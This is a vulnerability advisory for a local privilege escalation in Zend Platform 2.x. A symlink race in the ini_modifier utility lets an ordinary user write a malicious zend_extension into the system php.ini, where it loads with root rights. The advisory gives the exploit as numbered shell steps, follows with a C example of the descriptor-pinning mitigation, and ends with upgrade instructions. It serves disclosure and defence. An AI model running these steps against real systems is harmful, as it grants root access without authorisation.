Info |
Last Modified |
| 6 months ago |
|
|
Description |
Zend Platform contains a flaw that may allow a malicious local user to gain unauthorized privileges. The issue is triggered by using the ini_modifier utility's -f parameter to edit a copy of php.ini, the file that controls the loading of PHP extensions, which run with root credentials. While the utility is still open, the user performs a symlink attack: the directory that contains the attacker-controlled php.ini copy is moved aside and its name is linked to /usr/local/Zend/etc, so the pending changes are written to the system-wide php.ini. Upon server restart, the injected malicious PHP extensions will be run with root credentials. This flaw may lead to a loss of integrity.
|
|
Classification |
Location: Local Access Required
Attack Type: Misconfiguration, Race Condition
Impact: Loss of Integrity
Exploit: Exploit Available
Disclosure: OSVDB Verified
|
|
Technical |
The purpose of the ini_modifier binary is to edit the system-wide php.ini file from within Zend Platform's GUI. The ini_modifier binary is protected by the GUI password, which needs to be entered before being allowed to edit anything.

    (ini_modifier) help
    modify entry - Modifies an entry.
    switch extension - Enables or disables an extension.
    switch zend_extension - Enables or disables a Zend extension.
    help - Shows this help.
    write - Writes the changes.
    quit - Quits the program.

1) Create a temporary directory and copy the /usr/local/Zend/etc/php.ini file into that directory:

    $ cd /tmp
    $ mkdir ini
    $ cd ini
    $ cp /usr/local/Zend/etc/php.ini .

2) Edit zend_gui_password in the php.ini copy to an MD5 hash of your choice, but make sure to remember the old MD5 hash:

    $ cd ..
    $ /usr/local/Zend/sbin/ini_modifier -f /tmp/ini/php.ini -n
    Password:
    (ini_modifier) switch zend_extension /var/www/upload/evil.so on
    (ini_modifier) modify entry Zend zend_gui_password OLDMD5
    (ini_modifier)

3) Perform a symlink attack using the directory that contains the attacker-controlled php.ini file and link this directory to /usr/local/Zend/etc:

    $ cd /tmp
    $ mv ini ini.bak
    $ ln -s /usr/local/Zend/etc ini

4) Continue to edit the ini file:

    (ini_modifier) write
    (ini_modifier) quit
    $ cat /usr/local/Zend/etc/php.ini
    [PHP]
    zend_extension=/var/www/upload/evil.so
    ...
    zend_gui_password=OLDMD5
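
The steps above succeed because the path given with -f is resolved again at write time, after the directory has been swapped. The following is an added example, not Zend's code or its actual fix: it shows the usual mitigation for this class of race, pinning the directory with a descriptor and writing relative to it. The function names and the etc/ and work/ directories are constructed for illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open the working directory once; fails if the last component is a symlink. */
int pin_dir(const char *dir)
{
    return open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
}

/* Write `name` relative to the pinned descriptor, never by re-resolving the
 * path, so a later rename or symlink of the directory cannot redirect it. */
int write_pinned(int dirfd, const char *name, const char *data)
{
    size_t len = strlen(data);
    int fd = openat(dirfd, name, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    int ok = write(fd, data, len) == (ssize_t)len;
    return (close(fd) == 0 && ok) ? 0 : -1;
}

/* Constructed scenario: etc/ stands in for the protected directory, work/ for
 * the user's copy. Returns 1 if etc/php.ini is unchanged after the swap. */
int demo_swap(void)
{
    char base[] = "/tmp/pinXXXXXX", buf[32] = {0};
    if (!mkdtemp(base) || chdir(base) != 0 ||
        mkdir("etc", 0700) != 0 || mkdir("work", 0700) != 0)
        return -1;
    int etc = pin_dir("etc"), work = pin_dir("work");  /* pinned at start */
    if (write_pinned(etc, "php.ini", "system\n") != 0)
        return -1;
    if (rename("work", "work.bak") != 0 || symlink("etc", "work") != 0)
        return -1;
    if (write_pinned(work, "php.ini", "edited\n") != 0)  /* lands in work.bak */
        return -1;
    int fd = openat(etc, "php.ini", O_RDONLY);
    ssize_t n = fd < 0 ? -1 : read(fd, buf, sizeof buf - 1);
    return n > 0 && strcmp(buf, "system\n") == 0 && pin_dir("work") < 0;
}

int main(void)
{
    return demo_swap() == 1 ? 0 : 1;
}
```

Descriptor pinning only addresses the path swap; a privileged helper that accepts a user-supplied file should also drop its elevated credentials before touching that file.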
|
|
Solution |
Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s):

1. Log in as root.
2. Download the ini_modifier archive for your platform from the Zend Platform website.
3. Extract the archive and copy the updated ini_modifier binary to: Platform_install_dir/sbin/ini_modifier
4. Enter: chown root Platform_install_dir/sbin/ini_modifier
5. Enter: chgrp zendtech Platform_install_dir/sbin/ini_modifier
6. Enter: chmod 2755 Platform_install_dir/sbin/ini_modifier
2. Remove the old ini_modifier binary from your system (do not back it up).
|
|
Products |
|
Zend
 |
2.x |
|
|
Credit |
- Stefan Esser - sesser
hardened-php.net - www.hardened-php.net